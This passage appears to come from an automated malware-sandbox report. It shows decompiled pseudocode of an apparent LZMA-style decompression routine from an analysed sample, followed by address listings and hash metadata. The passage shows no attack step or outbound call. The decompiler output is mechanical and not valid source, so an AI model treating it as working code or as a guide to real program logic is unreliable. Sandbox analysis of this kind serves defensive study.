											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                            0x00407194
                            0x00407194
                            0x00407194
                            0x00407194
                            0x0040719a
                            0x0040719e
                            0x004071a2
                            0x004071ac
                            0x004071ba
                            0x00407490
                            0x00407490
                            0x00407493
                            0x0040749a
                            0x004074c7
                            0x004074c7
                            0x004074cb
                            0x00000000
                            0x00000000
                            0x004074cd
                            0x004074d6
                            0x004074dc
                            0x004074df
                            0x004074e2
                            0x004074e5
                            0x004074e8
                            0x004074ee
                            0x00407507
                            0x0040750a
                            0x00407516
                            0x00407517
                            0x0040751a
                            0x004074f0
                            0x004074f0
                            0x004074ff
                            0x00407502
                            0x00407502
                            0x00407524
                            0x004074c4
                            0x004074c4
                            0x004074c4
                            0x004074c7
                            0x004074cb
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00407526
                            0x00407526
                            0x0040749f
                            0x004074a3
                            0x004075db
                            0x004075db
                            0x004075e5
                            0x004075ed
                            0x004075f4
                            0x004075f6
                            0x004075fd
                            0x00407601
                            0x00407601
                            0x004074a9
                            0x004074af
                            0x004074b6
                            0x004074be
                            0x004074be
                            0x004074c1
                            0x00000000
                            0x004074c1
                            0x0040752b
                            0x00407538
                            0x0040753b
                            0x00407447
                            0x00407447
                            0x00407447
                            0x00406be3
                            0x00406be3
                            0x00406be3
                            0x00406bec
                            0x00000000
                            0x00000000
                            0x00406bf2
                            0x00406bf2
                            0x00000000
                            0x00406bf9
                            0x00406bfd
                            0x00000000
                            0x00000000
                            0x00406c03
                            0x00406c06
                            0x00406c09
                            0x00406c0c
                            0x00406c10
                            0x00000000
                            0x00000000
                            0x00406c16
                            0x00406c16
                            0x00406c19
                            0x00406c1b
                            0x00406c1c
                            0x00406c1f
                            0x00406c21
                            0x00406c22
                            0x00406c24
                            0x00406c27
                            0x00406c2c
                            0x00406c31
                            0x00406c3a
                            0x00406c4d
                            0x00406c50
                            0x00406c5c
                            0x00406c84
                            0x00406c86
                            0x00406c94
                            0x00406c94
                            0x00406c98
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406c88
                            0x00406c88
                            0x00406c8b
                            0x00406c8c
                            0x00406c8c
                            0x00000000
                            0x00406c88
                            0x00406c5e
                            0x00406c62
                            0x00406c67
                            0x00406c67
                            0x00406c70
                            0x00406c78
                            0x00406c7b
                            0x00000000
                            0x00406c81
                            0x00406c81
                            0x00000000
                            0x00406c81
                            0x00000000
                            0x00406c9e
                            0x00406c9e
                            0x00406ca2
                            0x0040754e
                            0x0040754e
                            0x00000000
                            0x0040754e
                            0x00406ca8
                            0x00406cab
                            0x00406cbb
                            0x00406cbe
                            0x00406cc1
                            0x00406cc1
                            0x00406cc1
                            0x00406cc4
                            0x00406cc8
                            0x00000000
                            0x00000000
                            0x00406cca
                            0x00406cca
                            0x00406cd0
                            0x00406cfa
                            0x00406d00
                            0x00406d07
                            0x00000000
                            0x00406d07
                            0x00406cd2
                            0x00406cd6
                            0x00406cd9
                            0x00406cde
                            0x00406cde
                            0x00406ce9
                            0x00406cf1
                            0x00406cf4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406d39
                            0x00406d3f
                            0x00406d42
                            0x00406d4f
                            0x00406d57
                            0x00000000
                            0x00000000
                            0x00406d0e
                            0x00406d0e
                            0x00406d12
                            0x0040755d
                            0x0040755d
                            0x00000000
                            0x0040755d
                            0x00406d18
                            0x00406d1e
                            0x00406d29
                            0x00406d29
                            0x00406d29
                            0x00406d2c
                            0x00406d2f
                            0x00406d32
                            0x00406d37
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004073ce
                            0x004073ce
                            0x004073d4
                            0x004073da
                            0x004073e0
                            0x004073fa
                            0x004073fd
                            0x00407403
                            0x0040740e
                            0x0040740e
                            0x00407410
                            0x004073e2
                            0x004073e2
                            0x004073f1
                            0x004073f5
                            0x004073f5
                            0x0040741a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040741c
                            0x00407420
                            0x004075cf
                            0x004075cf
                            0x00000000
                            0x004075cf
                            0x00407426
                            0x0040742c
                            0x00407433
                            0x0040743b
                            0x0040743e
                            0x00407441
                            0x00407441
                            0x00407447
                            0x00407447
                            0x00000000
                            0x00000000
                            0x00406d5f
                            0x00406d5f
                            0x00406d61
                            0x00406d64
                            0x00406dd5
                            0x00406dd5
                            0x00406dd8
                            0x00406ddb
                            0x00406de2
                            0x00406dec
                            0x00000000
                            0x00406dec
                            0x00406d66
                            0x00406d66
                            0x00406d6a
                            0x00406d6d
                            0x00406d6f
                            0x00406d72
                            0x00406d75
                            0x00406d77
                            0x00406d7a
                            0x00406d7c
                            0x00406d81
                            0x00406d84
                            0x00406d87
                            0x00406d8b
                            0x00406d92
                            0x00406d95
                            0x00406d9c
                            0x00406da0
                            0x00406da8
                            0x00406da8
                            0x00406da8
                            0x00406da2
                            0x00406da2
                            0x00406da2
                            0x00406d97
                            0x00406d97
                            0x00406d97
                            0x00406dac
                            0x00406daf
                            0x00406dcd
                            0x00406dcd
                            0x00406dcf
                            0x00000000
                            0x00406db1
                            0x00406db1
                            0x00406db1
                            0x00406db4
                            0x00406db7
                            0x00406dba
                            0x00406dbc
                            0x00406dbc
                            0x00406dbc
                            0x00406dbf
                            0x00406dc2
                            0x00406dc4
                            0x00406dc5
                            0x00406dc8
                            0x00000000
                            0x00406dc8
                            0x00000000
                            0x00406ffe
                            0x00406ffe
                            0x00407002
                            0x00407020
                            0x00407020
                            0x00407023
                            0x0040702a
                            0x0040702d
                            0x00407030
                            0x00407033
                            0x00407036
                            0x00407039
                            0x0040703b
                            0x00407042
                            0x00407043
                            0x00407045
                            0x00407048
                            0x0040704b
                            0x0040704e
                            0x0040704e
                            0x00407053
                            0x00000000
                            0x00407053
                            0x00407004
                            0x00407004
                            0x00407007
                            0x0040700a
                            0x00407014
                            0x00000000
                            0x00000000
                            0x00407068
                            0x00407068
                            0x0040706c
                            0x0040708f
                            0x00407092
                            0x00407095
                            0x0040709f
                            0x0040706e
                            0x0040706e
                            0x00407071
                            0x00407074
                            0x00407077
                            0x00407084
                            0x00407087
                            0x00407087
                            0x00000000
                            0x00000000
                            0x004070ab
                            0x004070ab
                            0x004070af
                            0x00000000
                            0x00000000
                            0x004070b5
                            0x004070b5
                            0x004070b9
                            0x00000000
                            0x00000000
                            0x004070bf
                            0x004070bf
                            0x004070c1
                            0x004070c5
                            0x004070c5
                            0x004070c8
                            0x004070cc
                            0x00000000
                            0x00000000
                            0x0040711c
                            0x0040711c
                            0x00407120
                            0x00407127
                            0x00407127
                            0x0040712a
                            0x0040712d
                            0x00407137
                            0x00000000
                            0x00407137
                            0x00407122
                            0x00407122
                            0x00000000
                            0x00000000
                            0x00407143
                            0x00407143
                            0x00407147
                            0x0040714e
                            0x00407151
                            0x00407154
                            0x00407149
                            0x00407149
                            0x00407149
                            0x00407157
                            0x0040715a
                            0x0040715d
                            0x0040715d
                            0x00407160
                            0x00407163
                            0x00407166
                            0x00407166
                            0x00407169
                            0x00407170
                            0x00407175
                            0x00000000
                            0x00000000
                            0x00407203
                            0x00407203
                            0x00407207
                            0x004075a5
                            0x004075a5
                            0x00000000
                            0x004075a5
                            0x0040720d
                            0x0040720d
                            0x00407210
                            0x00407213
                            0x00407217
                            0x0040721a
                            0x00407220
                            0x00407222
                            0x00407222
                            0x00407222
                            0x00407225
                            0x00407228
                            0x00000000
                            0x00000000
                            0x00406df8
                            0x00406df8
                            0x00406dfc
                            0x00407569
                            0x00407569
                            0x00000000
                            0x00407569
                            0x00406e02
                            0x00406e02
                            0x00406e05
                            0x00406e08
                            0x00406e0c
                            0x00406e0f
                            0x00406e15
                            0x00406e17
                            0x00406e17
                            0x00406e17
                            0x00406e1a
                            0x00406e1d
                            0x00406e1d
                            0x00406e20
                            0x00406e23
                            0x00000000
                            0x00000000
                            0x00406e29
                            0x00406e29
                            0x00406e2f
                            0x00000000
                            0x00000000
                            0x00406e35
                            0x00406e35
                            0x00406e39
                            0x00406e3c
                            0x00406e3f
                            0x00406e42
                            0x00406e45
                            0x00406e46
                            0x00406e49
                            0x00406e4b
                            0x00406e51
                            0x00406e54
                            0x00406e57
                            0x00406e5a
                            0x00406e5d
                            0x00406e60
                            0x00406e63
                            0x00406e7f
                            0x00406e82
                            0x00406e85
                            0x00406e88
                            0x00406e8f
                            0x00406e93
                            0x00406e95
                            0x00406e99
                            0x00406e65
                            0x00406e65
                            0x00406e69
                            0x00406e71
                            0x00406e76
                            0x00406e78
                            0x00406e7a
                            0x00406e7a
                            0x00406e9c
                            0x00406ea3
                            0x00406ea6
                            0x00000000
                            0x00406eac
                            0x00406eac
                            0x00000000
                            0x00406eac
                            0x00000000
                            0x00406eb1
                            0x00406eb1
                            0x00406eb5
                            0x00407575
                            0x00407575
                            0x00000000
                            0x00407575
                            0x00406ebb
                            0x00406ebb
                            0x00406ebe
                            0x00406ec1
                            0x00406ec5
                            0x00406ec8
                            0x00406ece
                            0x00406ed0
                            0x00406ed0
                            0x00406ed0
                            0x00406ed3
                            0x00406ed6
                            0x00406ed6
                            0x00406ed6
                            0x00406edc
                            0x00000000
                            0x00000000
                            0x00406ede
                            0x00406ede
                            0x00406ee1
                            0x00406ee4
                            0x00406ee7
                            0x00406eea
                            0x00406eed
                            0x00406ef0
                            0x00406ef3
                            0x00406ef6
                            0x00406ef9
                            0x00406efc
                            0x00406f14
                            0x00406f17
                            0x00406f1a
                            0x00406f1d
                            0x00406f1d
                            0x00406f20
                            0x00406f24
                            0x00406f26
                            0x00406efe
                            0x00406efe
                            0x00406f06
                            0x00406f0b
                            0x00406f0d
                            0x00406f0f
                            0x00406f0f
                            0x00406f29
                            0x00406f30
                            0x00406f33
                            0x00000000
                            0x00406f35
                            0x00406f35
                            0x00000000
                            0x00406f35
                            0x00406f33
                            0x00406f3a
                            0x00406f3a
                            0x00406f3a
                            0x00406f3a
                            0x00000000
                            0x00000000
                            0x00406f75
                            0x00406f75
                            0x00406f79
                            0x00407581
                            0x00407581
                            0x00000000
                            0x00407581
                            0x00406f7f
                            0x00406f7f
                            0x00406f82
                            0x00406f85
                            0x00406f89
                            0x00406f8c
                            0x00406f92
                            0x00406f94
                            0x00406f94
                            0x00406f94
                            0x00406f97
                            0x00406f9a
                            0x00406f9a
                            0x00406fa0
                            0x00406f3e
                            0x00406f3e
                            0x00406f41
                            0x00000000
                            0x00406f41
                            0x00406fa2
                            0x00406fa2
                            0x00406fa5
                            0x00406fa8
                            0x00406fab
                            0x00406fae
                            0x00406fb1
                            0x00406fb4
                            0x00406fb7
                            0x00406fba
                            0x00406fbd
                            0x00406fc0
                            0x00406fd8
                            0x00406fdb
                            0x00406fde
                            0x00406fe1
                            0x00406fe1
                            0x00406fe4
                            0x00406fe8
                            0x00406fea
                            0x00406fc2
                            0x00406fc2
                            0x00406fca
                            0x00406fcf
                            0x00406fd1
                            0x00406fd3
                            0x00406fd3
                            0x00406fed
                            0x00406ff4
                            0x00406ff7
                            0x00000000
                            0x00406ff9
                            0x00406ff9
                            0x00000000
                            0x00406ff9
                            0x00000000
                            0x00407286
                            0x00407286
                            0x0040728a
                            0x004075b1
                            0x004075b1
                            0x00000000
                            0x004075b1
                            0x00407290
                            0x00407290
                            0x00407293
                            0x00407296
                            0x0040729a
                            0x0040729d
                            0x004072a3
                            0x004072a5
                            0x004072a5
                            0x004072a5
                            0x004072a8
                            0x00000000
                            0x00000000
                            0x00407056
                            0x00407056
                            0x00407059
                            0x00000000
                            0x00000000
                            0x00407395
                            0x00407395
                            0x00407399
                            0x004073bb
                            0x004073bb
                            0x004073be
                            0x004073c8
                            0x004073cb
                            0x004073cb
                            0x00000000
                            0x004073cb
                            0x0040739b
                            0x0040739b
                            0x0040739e
                            0x004073a2
                            0x004073a5
                            0x004073a5
                            0x004073a8
                            0x00000000
                            0x00000000
                            0x00407452
                            0x00407452
                            0x00407456
                            0x00407474
                            0x00407474
                            0x00407474
                            0x00407474
                            0x0040747b
                            0x00407482
                            0x00407489
                            0x00407489
                            0x00407490
                            0x00407493
                            0x0040749a
                            0x00000000
                            0x0040749d
                            0x00407458
                            0x00407458
                            0x0040745b
                            0x0040745e
                            0x00407461
                            0x00407468
                            0x004073ac
                            0x004073ac
                            0x004073af
                            0x00000000
                            0x00000000
                            0x00407543
                            0x00407543
                            0x00407546
                            0x00407447
                            0x00407447
                            0x00407447
                            0x00000000
                            0x0040744d
                            0x00000000
                            0x0040717d
                            0x0040717d
                            0x0040717f
                            0x00407186
                            0x00407187
                            0x00407189
                            0x0040718c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00407490
                            0x00407490
                            0x00407493
                            0x0040749a
                            0x00000000
                            0x0040749d
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004071c2
                            0x004071c2
                            0x004071c5
                            0x004071fb
                            0x004071fb
                            0x0040732b
                            0x0040732b
                            0x0040732b
                            0x0040732b
                            0x0040732e
                            0x0040732e
                            0x00407331
                            0x00407333
                            0x004075bd
                            0x004075bd
                            0x00000000
                            0x004075bd
                            0x00407339
                            0x00407339
                            0x0040733c
                            0x00000000
                            0x00000000
                            0x00407342
                            0x00407342
                            0x00407346
                            0x00407349
                            0x00407349
                            0x00407349
                            0x00000000
                            0x00407349
                            0x004071c7
                            0x004071c7
                            0x004071c9
                            0x004071cb
                            0x004071cd
                            0x004071d0
                            0x004071d1
                            0x004071d3
                            0x004071d5
                            0x004071d8
                            0x004071db
                            0x004071f1
                            0x004071f1
                            0x004071f6
                            0x0040722e
                            0x0040722e
                            0x00407232
                            0x0040725b
                            0x0040725e
                            0x00407260
                            0x00407267
                            0x0040726a
                            0x0040726d
                            0x0040726d
                            0x00407272
                            0x00407272
                            0x00407274
                            0x00407277
                            0x0040727e
                            0x00407281
                            0x004072ae
                            0x004072ae
                            0x004072b1
                            0x004072b4
                            0x00407328
                            0x00407328
                            0x00407328
                            0x00407328
                            0x00000000
                            0x00407328
                            0x004072b6
                            0x004072b6
                            0x004072bc
                            0x004072bf
                            0x004072c2
                            0x004072c5
                            0x004072c8
                            0x004072cb
                            0x004072ce
                            0x004072d1
                            0x004072d4
                            0x004072d7
                            0x004072f0
                            0x004072f2
                            0x004072f5
                            0x004072f6
                            0x004072f9
                            0x004072fb
                            0x004072fe
                            0x00407300
                            0x00407302
                            0x00407305
                            0x00407307
                            0x0040730a
                            0x0040730e
                            0x00407310
                            0x00407310
                            0x00407311
                            0x00407314
                            0x00407317
                            0x004072d9
                            0x004072d9
                            0x004072e1
                            0x004072e6
                            0x004072e8
                            0x004072eb
                            0x004072eb
                            0x0040731a
                            0x00407321
                            0x004072ab
                            0x004072ab
                            0x004072ab
                            0x004072ab
                            0x00000000
                            0x00407323
                            0x00407323
                            0x00000000
                            0x00407323
                            0x00407321
                            0x00407234
                            0x00407234
                            0x00407237
                            0x00407239
                            0x0040723c
                            0x0040723f
                            0x00407242
                            0x00407244
                            0x00407247
                            0x0040724a
                            0x0040724a
                            0x0040724d
                            0x0040724d
                            0x00407250
                            0x00407257
                            0x0040722b
                            0x0040722b
                            0x0040722b
                            0x0040722b
                            0x00000000
                            0x00407259
                            0x00407259
                            0x00000000
                            0x00407259
                            0x00407257
                            0x004071dd
                            0x004071dd
                            0x004071e0
                            0x004071e2
                            0x004071e5
                            0x00000000
                            0x00000000
                            0x00406f44
                            0x00406f44
                            0x00406f48
                            0x0040758d
                            0x0040758d
                            0x00000000
                            0x0040758d
                            0x00406f4e
                            0x00406f4e
                            0x00406f51
                            0x00406f54
                            0x00406f57
                            0x00406f5a
                            0x00406f5d
                            0x00406f60
                            0x00406f62
                            0x00406f65
                            0x00406f68
                            0x00406f6b
                            0x00406f6d
                            0x00406f6d
                            0x00406f6d
                            0x00000000
                            0x00000000
                            0x004070cf
                            0x004070cf
                            0x004070d3
                            0x00407599
                            0x00407599
                            0x00000000
                            0x00407599
                            0x004070d9
                            0x004070d9
                            0x004070dc
                            0x004070df
                            0x004070e2
                            0x004070e4
                            0x004070e4
                            0x004070e4
                            0x004070e7
                            0x004070ea
                            0x004070ed
                            0x004070f0
                            0x004070f3
                            0x004070f6
                            0x004070f7
                            0x004070f9
                            0x004070f9
                            0x004070f9
                            0x004070fc
                            0x004070ff
                            0x00407102
                            0x00407105
                            0x00407105
                            0x00407105
                            0x00407108
                            0x0040710a
                            0x0040710a
                            0x00000000
                            0x00000000
                            0x0040734c
                            0x0040734c
                            0x0040734c
                            0x00407350
                            0x00000000
                            0x00000000
                            0x00407356
                            0x00407356
                            0x00407359
                            0x0040735c
                            0x0040735f
                            0x00407361
                            0x00407361
                            0x00407361
                            0x00407364
                            0x00407367
                            0x0040736a
                            0x0040736d
                            0x00407370
                            0x00407373
                            0x00407374
                            0x00407376
                            0x00407376
                            0x00407376
                            0x00407379
                            0x0040737c
                            0x0040737f
                            0x00407382
                            0x00407385
                            0x00407389
                            0x0040738b
                            0x0040738e
                            0x00000000
                            0x00407390
                            0x00407390
                            0x0040710d
                            0x0040710d
                            0x00000000
                            0x0040710d
                            0x0040738e
                            0x004075c3
                            0x004075c3
                            0x00000000
                            0x00000000
                            0x00406bf2
                            0x004075fa
                            0x004075fa
                            0x00000000
                            0x004075fa
                            0x00407447
                            0x004074c7
                            0x00407490

                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                            • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                            • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                            • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00407395 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                            Download Yara Rule
                            C-Code - Quality: 98%
                            			E00407395() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
